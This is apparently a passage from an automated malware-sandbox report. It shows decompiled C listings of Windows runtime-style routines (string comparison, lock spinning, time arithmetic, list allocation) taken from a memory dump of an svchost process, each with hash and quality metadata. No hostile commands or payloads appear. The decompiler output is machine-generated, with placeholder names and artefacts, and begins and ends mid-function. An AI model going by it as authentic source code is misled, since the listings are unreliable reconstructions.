                                          						_t58 =  *0x3b18450; // 0x0
                                          						if(_t58 == 0) {
                                          							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                          						}
                                          					} else {
                                          						_t26 = _t57 + 0x3b1821c; // 0x0
                                          						_t58 =  *_t26;
                                          					}
                                          					 *_t90 = _t58;
                                          					goto L15;
                                          				} else {
                                          					goto L2;
                                          				}
                                          				while(1) {
                                          					_t116 =  *_t61 & 0x0000ffff;
                                          					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                          					if(_t116 == _t128) {
                                          						goto L18;
                                          					}
                                          					L5:
                                          					if(_t116 >= 0x61) {
                                          						if(_t116 > 0x7a) {
                                          							_t97 =  *0x3b16d5c; // 0x7f340654
                                          							_t72 =  *0x3b16d5c; // 0x7f340654
                                          							_t75 =  *0x3b16d5c; // 0x7f340654
                                          							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                          						} else {
                                          							_t116 = _t116 - 0x20;
                                          						}
                                          					}
                                          					if(_t128 >= 0x61) {
                                          						if(_t128 > 0x7a) {
                                          							_t102 =  *0x3b16d5c; // 0x7f340654
                                          							_t84 =  *0x3b16d5c; // 0x7f340654
                                          							_t87 =  *0x3b16d5c; // 0x7f340654
                                          							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                          						} else {
                                          							_t128 = _t128 - 0x20;
                                          						}
                                          					}
                                          					if(_t116 == _t128) {
                                          						_t61 = _v12;
                                          						_t96 = _v8;
                                          					} else {
                                          						_t113 = _t116 - _t128;
                                          						L9:
                                          						_t111 = _a4;
                                          						if(_t113 == 0) {
                                          							_t115 =  &(( *_t119)[_t111 + 1]);
                                          							_t33 =  &(_t119[1]); // 0x100
                                          							_t120 = _a8;
                                          							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                          							_t35 = _t95 - 1; // 0xff
                                          							_t124 = _t35;
                                          							if(_t120 == 0) {
                                          								L27:
                                          								 *_a16 = _t95;
                                          								_t56 = 0xc0000023;
                                          								goto L16;
                                          							}
                                          							if(_t124 >= _a12) {
                                          								if(_a12 >= 1) {
                                          									 *_t120 = 0;
                                          								}
                                          								goto L27;
                                          							}
                                          							 *_a16 = _t124;
                                          							_t125 = _t124 + _t124;
                                          							E03A6F3E0(_t120, _t115, _t125);
                                          							_t56 = 0;
                                          							 *((short*)(_t125 + _t120)) = 0;
                                          							goto L16;
                                          						}
                                          						_t119 =  &(_t119[2]);
                                          						if(_t119 < _v24) {
                                          							L2:
                                          							_t91 =  *_t119;
                                          							_t61 = _t91;
                                          							_v12 = _t61;
                                          							_t112 =  &(_t61[_t111]);
                                          							_v8 = _t112;
                                          							if(_t61 >= _t112) {
                                          								break;
                                          							} else {
                                          								_t127 = _v16 - _t91;
                                          								_t96 = _t112;
                                          								_v20 = _t127;
                                          								_t116 =  *_t61 & 0x0000ffff;
                                          								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                          								if(_t116 == _t128) {
                                          									goto L18;
                                          								}
                                          								goto L5;
                                          							}
                                          						} else {
                                          							_t90 = _v28;
                                          							_t57 = _v32;
                                          							_t123 = _v36;
                                          							goto L12;
                                          						}
                                          					}
                                          					L18:
                                          					_t61 =  &(_t61[1]);
                                          					_v12 = _t61;
                                          					if(_t61 >= _t96) {
                                          						break;
                                          					}
                                          					_t127 = _v20;
                                          				}
                                          				_t113 = 0;
                                          				goto L9;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b8abe8a9157747bff5238715f74711cfc3e420f420a8240742ed9059c6d4096f
                                          • Instruction ID: d0469853dd44d04fc85a044a9260dbc785e2a3d653ac30b5eff9eb1ff39dd2fd
                                          • Opcode Fuzzy Hash: b8abe8a9157747bff5238715f74711cfc3e420f420a8240742ed9059c6d4096f
                                          • Instruction Fuzzy Hash: 79518CB6E001258FCB18DF1DC890ABDB7B5FB88704716895BFC56AB325D730AA51CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E03AEAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed short* _t36;
                                          				signed int _t41;
                                          				char* _t42;
                                          				intOrPtr _t43;
                                          				signed int _t47;
                                          				void* _t52;
                                          				signed int _t57;
                                          				intOrPtr _t61;
                                          				signed char _t62;
                                          				signed int _t72;
                                          				signed char _t85;
                                          				signed int _t88;
                                          
                                          				_t73 = __edx;
                                          				_push(__ecx);
                                          				_t85 = __ecx;
                                          				_v8 = __edx;
                                          				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                                          				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                                          				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                          					_t57 = _t57 | 0x00000001;
                                          				}
                                          				_t88 = 0;
                                          				_t36 = 0;
                                          				_t96 = _a12;
                                          				if(_a12 == 0) {
                                          					_t62 = _a8;
                                          					__eflags = _t62;
                                          					if(__eflags == 0) {
                                          						goto L12;
                                          					}
                                          					_t52 = E03AEC38B(_t85, _t73, _t57, 0);
                                          					_t62 = _a8;
                                          					 *_t62 = _t52;
                                          					_t36 = 0;
                                          					goto L11;
                                          				} else {
                                          					_t36 = E03AEACFD(_t85, _t73, _t96, _t57, _a8);
                                          					if(0 == 0 || 0 == 0xffffffff) {
                                          						_t72 = _t88;
                                          					} else {
                                          						_t72 =  *0x00000000 & 0x0000ffff;
                                          					}
                                          					 *_a12 = _t72;
                                          					_t62 = _a8;
                                          					L11:
                                          					_t73 = _v8;
                                          					L12:
                                          					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                                          						L19:
                                          						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                                          							L22:
                                          							_t74 = _v8;
                                          							__eflags = _v8;
                                          							if(__eflags != 0) {
                                          								L25:
                                          								__eflags = _t88 - 2;
                                          								if(_t88 != 2) {
                                          									__eflags = _t85 + 0x44 + (_t88 << 6);
                                          									_t88 = E03AEFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                                          									goto L34;
                                          								}
                                          								L26:
                                          								_t59 = _v8;
                                          								E03AEEA55(_t85, _v8, _t57);
                                          								asm("sbb esi, esi");
                                          								_t88 =  ~_t88;
                                          								_t41 = E03A47D50();
                                          								__eflags = _t41;
                                          								if(_t41 == 0) {
                                          									_t42 = 0x7ffe0380;
                                          								} else {
                                          									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          								}
                                          								__eflags =  *_t42;
                                          								if( *_t42 != 0) {
                                          									_t43 =  *[fs:0x30];
                                          									__eflags =  *(_t43 + 0x240) & 0x00000001;
                                          									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                                          										__eflags = _t88;
                                          										if(_t88 != 0) {
                                          											E03AE1608(_t85, _t59, 3);
                                          										}
                                          									}
                                          								}
                                          								goto L34;
                                          							}
                                          							_push(_t62);
                                          							_t47 = E03AF1536(0x3b18ae4, (_t74 -  *0x3b18b04 >> 0x14) + (_t74 -  *0x3b18b04 >> 0x14), _t88, __eflags);
                                          							__eflags = _t47;
                                          							if(_t47 == 0) {
                                          								goto L26;
                                          							}
                                          							_t74 = _v12;
                                          							_t27 = _t47 - 1; // -1
                                          							_t88 = _t27;
                                          							goto L25;
                                          						}
                                          						_t62 = _t85;
                                          						if(L03AEC323(_t62, _v8, _t57) != 0xffffffff) {
                                          							goto L22;
                                          						}
                                          						_push(_t62);
                                          						_push(_t88);
                                          						E03AEA80D(_t85, 9, _v8, _t88);
                                          						goto L34;
                                          					} else {
                                          						_t101 = _t36;
                                          						if(_t36 != 0) {
                                          							L16:
                                          							if(_t36 == 0xffffffff) {
                                          								goto L19;
                                          							}
                                          							_t62 =  *((intOrPtr*)(_t36 + 2));
                                          							if((_t62 & 0x0000000f) == 0) {
                                          								goto L19;
                                          							}
                                          							_t62 = _t62 & 0xf;
                                          							if(E03ACCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                                          								L34:
                                          								return _t88;
                                          							}
                                          							goto L19;
                                          						}
                                          						_t62 = _t85;
                                          						_t36 = E03AEACFD(_t62, _t73, _t101, _t57, _t62);
                                          						if(_t36 == 0) {
                                          							goto L19;
                                          						}
                                          						goto L16;
                                          					}
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e9a0e7312777850b3076320fdd8602f0fa81443e28a40c34d950ec93596c839
                                          • Instruction ID: b2dc1d10fc6eb24e51d3ff80c2c636ec678cd9838c0c5372e17f81c56c734908
                                          • Opcode Fuzzy Hash: 4e9a0e7312777850b3076320fdd8602f0fa81443e28a40c34d950ec93596c839
                                          • Instruction Fuzzy Hash: 6A41B2B1B007119BD72ADB29C994B3BF79AAF84620F08861FF8168B390DB34D841C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E03A4DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				char _v5;
                                          				signed int _v12;
                                          				signed int* _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				intOrPtr _v40;
                                          				intOrPtr _v44;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed int _t54;
                                          				char* _t58;
                                          				signed int _t66;
                                          				intOrPtr _t67;
                                          				intOrPtr _t68;
                                          				intOrPtr _t72;
                                          				intOrPtr _t73;
                                          				signed int* _t75;
                                          				intOrPtr _t79;
                                          				intOrPtr _t80;
                                          				char _t82;
                                          				signed int _t83;
                                          				signed int _t84;
                                          				signed int _t88;
                                          				signed int _t89;
                                          				intOrPtr _t90;
                                          				intOrPtr _t92;
                                          				signed int _t97;
                                          				intOrPtr _t98;
                                          				intOrPtr* _t99;
                                          				signed int* _t101;
                                          				signed int* _t102;
                                          				intOrPtr* _t103;
                                          				intOrPtr _t105;
                                          				signed int _t106;
                                          				void* _t118;
                                          
                                          				_t92 = __edx;
                                          				_t75 = _a4;
                                          				_t98 = __ecx;
                                          				_v44 = __edx;
                                          				_t106 = _t75[1];
                                          				_v40 = __ecx;
                                          				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                          					_t82 = 0;
                                          				} else {
                                          					_t82 = 1;
                                          				}
                                          				_v5 = _t82;
                                          				_t6 = _t98 + 0xc8; // 0xc9
                                          				_t101 = _t6;
                                          				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                          				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                          				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                          				if(_t82 != 0) {
                                          					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                          					_t83 =  *_t75;
                                          					_t54 = _t75[1];
                                          					 *_t101 = _t83;
                                          					_t84 = _t83 | _t54;
                                          					_t101[1] = _t54;
                                          					if(_t84 == 0) {
                                          						_t101[1] = _t101[1] & _t84;
                                          						 *_t101 = 1;
                                          					}
                                          					goto L19;
                                          				} else {
                                          					if(_t101 == 0) {
                                          						E03A2CC50(E03A24510(0xc000000d));
                                          						_t88 =  *_t101;
                                          						_t97 = _t101[1];
                                          						L15:
                                          						_v12 = _t88;
                                          						_t66 = _t88 -  *_t75;
                                          						_t89 = _t97;
                                          						asm("sbb ecx, [ebx+0x4]");
                                          						_t118 = _t89 - _t97;
                                          						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                          							_t66 = _t66 | 0xffffffff;
                                          							_t89 = 0x7fffffff;
                                          						}
                                          						 *_t101 = _t66;
                                          						_t101[1] = _t89;
                                          						L19:
                                          						if(E03A47D50() != 0) {
                                          							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          						} else {
                                          							_t58 = 0x7ffe0386;
                                          						}
                                          						_t102 = _v16;
                                          						if( *_t58 != 0) {
                                          							_t58 = E03AF8ED6(_t102, _t98);
                                          						}
                                          						_t76 = _v44;
                                          						E03A42280(_t58, _v44);
                                          						E03A4DD82(_v44, _t102, _t98);
                                          						E03A4B944(_t102, _v5);
                                          						return E03A3FFB0(_t76, _t98, _t76);
                                          					}
                                          					_t99 = 0x7ffe03b0;
                                          					do {
                                          						_t103 = 0x7ffe0010;
                                          						do {
                                          							_t67 =  *0x3b18628; // 0x0
                                          							_v28 = _t67;
                                          							_t68 =  *0x3b1862c; // 0x0
                                          							_v32 = _t68;
                                          							_v24 =  *((intOrPtr*)(_t99 + 4));
                                          							_v20 =  *_t99;
                                          							while(1) {
                                          								_t97 =  *0x7ffe000c;
                                          								_t90 =  *0x7FFE0008;
                                          								if(_t97 ==  *_t103) {
                                          									goto L10;
                                          								}
                                          								asm("pause");
                                          							}
                                          							L10:
                                          							_t79 = _v24;
                                          							_t99 = 0x7ffe03b0;
                                          							_v12 =  *0x7ffe03b0;
                                          							_t72 =  *0x7FFE03B4;
                                          							_t103 = 0x7ffe0010;
                                          							_v36 = _t72;
                                          						} while (_v20 != _v12 || _t79 != _t72);
                                          						_t73 =  *0x3b18628; // 0x0
                                          						_t105 = _v28;
                                          						_t80 =  *0x3b1862c; // 0x0
                                          					} while (_t105 != _t73 || _v32 != _t80);
                                          					_t98 = _v40;
                                          					asm("sbb edx, [ebp-0x20]");
                                          					_t88 = _t90 - _v12 - _t105;
                                          					_t75 = _a4;
                                          					asm("sbb edx, eax");
                                          					_t31 = _t98 + 0xc8; // 0x3aefb53
                                          					_t101 = _t31;
                                          					 *_t101 = _t88;
                                          					_t101[1] = _t97;
                                          					goto L15;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33c2232612de1c04e64d5f07ed085b6a6c0f16cce9ad15215e42f98be0ed0277
                                          • Instruction ID: a537be7bf8788b7aed2a5e11472e6010c77fd29f7560293e15defd11f120c5c5
                                          • Opcode Fuzzy Hash: 33c2232612de1c04e64d5f07ed085b6a6c0f16cce9ad15215e42f98be0ed0277
                                          • Instruction Fuzzy Hash: DD519A75A01215CFCB14CFA8C590AAEFBF5BF88310F24869BD959AB345DB31AD44CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E03A3EF40(intOrPtr __ecx) {
                                          				char _v5;
                                          				char _v6;
                                          				char _v7;
                                          				char _v8;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr _t58;
                                          				char _t59;
                                          				signed char _t69;
                                          				void* _t73;
                                          				signed int _t74;
                                          				char _t79;
                                          				signed char _t81;
                                          				signed int _t85;
                                          				signed int _t87;
                                          				intOrPtr _t90;
                                          				signed char* _t91;
                                          				void* _t92;
                                          				signed int _t94;
                                          				void* _t96;
                                          
                                          				_t90 = __ecx;
                                          				_v16 = __ecx;
                                          				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                          					_t58 =  *((intOrPtr*)(__ecx));
                                          					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                          						E03A29080(_t73, __ecx, __ecx, _t92);
                                          					}
                                          				}
                                          				_t74 = 0;
                                          				_t96 =  *0x7ffe036a - 1;
                                          				_v12 = 0;
                                          				_v7 = 0;
                                          				if(_t96 > 0) {
                                          					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                          					_v12 = _t74;
                                          					_v7 = _t96 != 0;
                                          				}
                                          				_t79 = 0;
                                          				_v8 = 0;
                                          				_v5 = 0;
                                          				while(1) {
                                          					L4:
                                          					_t59 = 1;
                                          					L5:
                                          					while(1) {
                                          						if(_t59 == 0) {
                                          							L12:
                                          							_t21 = _t90 + 4; // 0x7788c21e
                                          							_t87 =  *_t21;
                                          							_v6 = 0;
                                          							if(_t79 != 0) {
                                          								if((_t87 & 0x00000002) != 0) {
                                          									goto L19;
                                          								}
                                          								if((_t87 & 0x00000001) != 0) {
                                          									_v6 = 1;
                                          									_t74 = _t87 ^ 0x00000003;
                                          								} else {
                                          									_t51 = _t87 - 2; // -2
                                          									_t74 = _t51;
                                          								}
                                          								goto L15;
                                          							} else {
                                          								if((_t87 & 0x00000001) != 0) {
                                          									_v6 = 1;
                                          									_t74 = _t87 ^ 0x00000001;
                                          								} else {
                                          									_t26 = _t87 - 4; // -4
                                          									_t74 = _t26;
                                          									if((_t74 & 0x00000002) == 0) {
                                          										_t74 = _t74 - 2;
                                          									}
                                          								}
                                          								L15:
                                          								if(_t74 == _t87) {
                                          									L19:
                                          									E03A22D8A(_t74, _t90, _t87, _t90);
                                          									_t74 = _v12;
                                          									_v8 = 1;
                                          									if(_v7 != 0 && _t74 > 0x64) {
                                          										_t74 = _t74 - 1;
                                          										_v12 = _t74;
                                          									}
                                          									_t79 = _v5;
                                          									goto L4;
                                          								}
                                          								asm("lock cmpxchg [esi], ecx");
                                          								if(_t87 != _t87) {
                                          									_t74 = _v12;
                                          									_t59 = 0;
                                          									_t79 = _v5;
                                          									continue;
                                          								}
                                          								if(_v6 != 0) {
                                          									_t74 = _v12;
                                          									L25:
                                          									if(_v7 != 0) {
                                          										if(_t74 < 0x7d0) {
                                          											if(_v8 == 0) {
                                          												_t74 = _t74 + 1;
                                          											}
                                          										}
                                          										_t38 = _t90 + 0x14; // 0x0
                                          										_t39 = _t90 + 0x14; // 0x0
                                          										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                          										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                          											_t85 = _t85 & 0xff000000;
                                          										}
                                          										 *(_t90 + 0x14) = _t85;
                                          									}
                                          									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                          									 *((intOrPtr*)(_t90 + 8)) = 1;
                                          									return 0;
                                          								}
                                          								_v5 = 1;
                                          								_t87 = _t74;
                                          								goto L19;
                                          							}
                                          						}
                                          						_t94 = _t74;
                                          						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                          						if(_t74 == 0) {
                                          							goto L12;
                                          						} else {
                                          							_t91 = _t90 + 4;
                                          							goto L8;
                                          							L9:
                                          							while((_t81 & 0x00000001) != 0) {
                                          								_t69 = _t81;
                                          								asm("lock cmpxchg [edi], edx");
                                          								if(_t69 != _t81) {
                                          									_t81 = _t69;
                                          									continue;
                                          								}
                                          								_t90 = _v16;
                                          								goto L25;
                                          							}
                                          							asm("pause");
                                          							_t94 = _t94 - 1;
                                          							if(_t94 != 0) {
                                          								L8:
                                          								_t81 =  *_t91;
                                          								goto L9;
                                          							} else {
                                          								_t90 = _v16;
                                          								_t79 = _v5;
                                          								goto L12;
                                          							}
                                          						}
                                          					}
                                          				}
                                          			}





























                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction ID: 46b58abe490fec568fe8f44715c6b3760dd681b591a81425aed303f1151eddf6
                                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction Fuzzy Hash: BE51E131E04249EFDB24CB6CC194BEEFBB1AF47314F1881AEE44597281D3B5A989C751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E03AF740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                          				signed short* _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _t55;
                                          				void* _t56;
                                          				intOrPtr* _t66;
                                          				intOrPtr* _t69;
                                          				void* _t74;
                                          				intOrPtr* _t78;
                                          				intOrPtr* _t81;
                                          				intOrPtr* _t82;
                                          				intOrPtr _t83;
                                          				signed short* _t84;
                                          				intOrPtr _t85;
                                          				signed int _t87;
                                          				intOrPtr* _t90;
                                          				intOrPtr* _t93;
                                          				intOrPtr* _t94;
                                          				void* _t98;
                                          
                                          				_t84 = __edx;
                                          				_t80 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t55 = __ecx;
                                          				_v8 = __edx;
                                          				_t87 =  *__edx & 0x0000ffff;
                                          				_v12 = __ecx;
                                          				_t3 = _t55 + 0x154; // 0x154
                                          				_t93 = _t3;
                                          				_t78 =  *_t93;
                                          				_t4 = _t87 + 2; // 0x2
                                          				_t56 = _t4;
                                          				while(_t78 != _t93) {
                                          					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                          						L4:
                                          						_t78 =  *_t78;
                                          						continue;
                                          					} else {
                                          						_t7 = _t78 + 0x18; // 0x18
                                          						if(E03A7D4F0(_t7, _t84[2], _t87) == _t87) {
                                          							_t40 = _t78 + 0xc; // 0xc
                                          							_t94 = _t40;
                                          							_t90 =  *_t94;
                                          							while(_t90 != _t94) {
                                          								_t41 = _t90 + 8; // 0x8
                                          								_t74 = E03A6F380(_a4, _t41, 0x10);
                                          								_t98 = _t98 + 0xc;
                                          								if(_t74 != 0) {
                                          									_t90 =  *_t90;
                                          									continue;
                                          								}
                                          								goto L12;
                                          							}
                                          							_t82 = L03A44620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                          							if(_t82 != 0) {
                                          								_t46 = _t78 + 0xc; // 0xc
                                          								_t69 = _t46;
                                          								asm("movsd");
                                          								asm("movsd");
                                          								asm("movsd");
                                          								asm("movsd");
                                          								_t85 =  *_t69;
                                          								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                          									L20:
                                          									_t82 = 3;
                                          									asm("int 0x29");
                                          								}
                                          								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                          								 *_t82 = _t85;
                                          								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                          								 *_t69 = _t82;
                                          								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                          								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                          								goto L11;
                                          							} else {
                                          								L18:
                                          								_push(0xe);
                                          								_pop(0);
                                          							}
                                          						} else {
                                          							_t84 = _v8;
                                          							_t9 = _t87 + 2; // 0x2
                                          							_t56 = _t9;
                                          							goto L4;
                                          						}
                                          					}
                                          					L12:
                                          					return 0;
                                          				}
                                          				_t10 = _t87 + 0x1a; // 0x1a
                                          				_t78 = L03A44620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                          				if(_t78 == 0) {
                                          					goto L18;
                                          				} else {
                                          					_t12 = _t87 + 2; // 0x2
                                          					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                          					_t16 = _t78 + 0x18; // 0x18
                                          					E03A6F3E0(_t16, _v8[2], _t87);
                                          					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                          					_t19 = _t78 + 0xc; // 0xc
                                          					_t66 = _t19;
                                          					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                          					 *_t66 = _t66;
                                          					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                          					_t81 = L03A44620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                          					if(_t81 == 0) {
                                          						goto L18;
                                          					} else {
                                          						_t26 = _t78 + 0xc; // 0xc
                                          						_t69 = _t26;
                                          						asm("movsd");
                                          						asm("movsd");
                                          						asm("movsd");
                                          						asm("movsd");
                                          						_t85 =  *_t69;
                                          						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                          							goto L20;
                                          						} else {
                                          							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                          							 *_t81 = _t85;
                                          							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                          							 *_t69 = _t81;
                                          							_t83 = _v12;
                                          							 *(_t78 + 8) = 1;
                                          							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                          							_t34 = _t83 + 0x154; // 0x1ba
                                          							_t69 = _t34;
                                          							_t85 =  *_t69;
                                          							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                          								goto L20;
                                          							} else {
                                          								 *_t78 = _t85;
                                          								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                          								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                          								 *_t69 = _t78;
                                          								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                          							}
                                          						}
                                          						goto L11;
                                          					}
                                          				}
                                          				goto L12;
                                          			}






















                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction ID: bffcd9b8616bff45820cf16da8a6653c3ba2e085b2ba7eb1b89b9629caef8284
                                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction Fuzzy Hash: B2519E71600606EFCB15CF54D980A66FBB9FF45344F18C0AAEA089F252E772E946CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 97%
                                          			E03A52990() {
                                          				signed int* _t62;
                                          				signed int _t64;
                                          				intOrPtr _t66;
                                          				signed short* _t69;
                                          				intOrPtr _t76;
                                          				signed short* _t79;
                                          				void* _t81;
                                          				signed int _t82;
                                          				signed short* _t83;
                                          				signed int _t87;
                                          				intOrPtr _t91;
                                          				void* _t98;
                                          				signed int _t99;
                                          				void* _t101;
                                          				signed int* _t102;
                                          				void* _t103;
                                          				void* _t104;
                                          				void* _t107;
                                          
                                          				_push(0x20);
                                          				_push(0x3afff00);
                                          				E03A7D08C(_t81, _t98, _t101);
                                          				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                          				_t99 = 0;
                                          				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                          				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                          				if(_t82 == 0) {
                                          					_t62 = 0xc0000100;
                                          				} else {
                                          					 *((intOrPtr*)(_t103 - 4)) = 0;
                                          					_t102 = 0xc0000100;
                                          					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                          					_t64 = 4;
                                          					while(1) {
                                          						 *(_t103 - 0x24) = _t64;
                                          						if(_t64 == 0) {
                                          							break;
                                          						}
                                          						_t87 = _t64 * 0xc;
                                          						 *(_t103 - 0x2c) = _t87;
                                          						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x3a01664));
                                          						if(_t107 <= 0) {
                                          							if(_t107 == 0) {
                                          								_t79 = E03A6E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x3a01668)), _t82);
                                          								_t104 = _t104 + 0xc;
                                          								__eflags = _t79;
                                          								if(__eflags == 0) {
                                          									_t102 = E03AA51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x3a0166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                          									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                          									break;
                                          								} else {
                                          									_t64 =  *(_t103 - 0x24);
                                          									goto L5;
                                          								}
                                          								goto L13;
                                          							} else {
                                          								L5:
                                          								_t64 = _t64 - 1;
                                          								continue;
                                          							}
                                          						}
                                          						break;
                                          					}
                                          					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                          					__eflags = _t102;
                                          					if(_t102 < 0) {
                                          						__eflags = _t102 - 0xc0000100;
